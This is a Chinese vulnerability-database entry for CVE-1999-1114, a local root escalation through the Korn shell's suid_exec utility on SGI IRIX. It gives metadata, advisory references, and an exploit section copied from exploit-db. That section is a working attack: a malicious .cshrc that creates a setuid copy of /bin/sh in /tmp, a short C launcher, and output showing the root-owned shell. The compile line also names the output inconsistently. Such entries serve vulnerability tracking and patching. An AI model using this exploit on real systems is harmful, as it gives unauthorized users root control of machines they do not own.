IRIX Korn Shell (ksh) suid_exec缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105268 漏洞类型 缓冲区溢出
发布时间 1996-12-02 更新时间 2005-05-02
CVE编号 CVE-1999-1114 CNNVD-ID CNNVD-199804-011
漏洞平台 IRIX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19353
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199804-011
|漏洞详情
IRIX6.x版本,或可能其他操作系统KornShell(ksh)上的suid_exec程序存在缓冲区溢出漏洞。本地用户可以利用该漏洞获得根权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/467/info

A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root. 


% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
main()
{
execl("/sbin/suid_exec","/bin/su","/bin/su",0);
}
^D
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*
|参考资料

来源:XF
名称:ksh-suid_exec(2100)
链接:http://xforce.iss.net/static/2100.php
来源:BID
名称:467
链接:http://www.securityfocus.com/bid/467
来源:CIAC
名称:H-15A
链接:http://ciac.llnl.gov/ciac/bulletins/h-15a.shtml
来源:SGI
名称:19980405-01-I
链接:ftp://patches.sgi.com/support/free/security/advisories/19980405-01-I
来源:AUSCERT
名称:AA-96.17
链接:ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.17.suid_exec.vul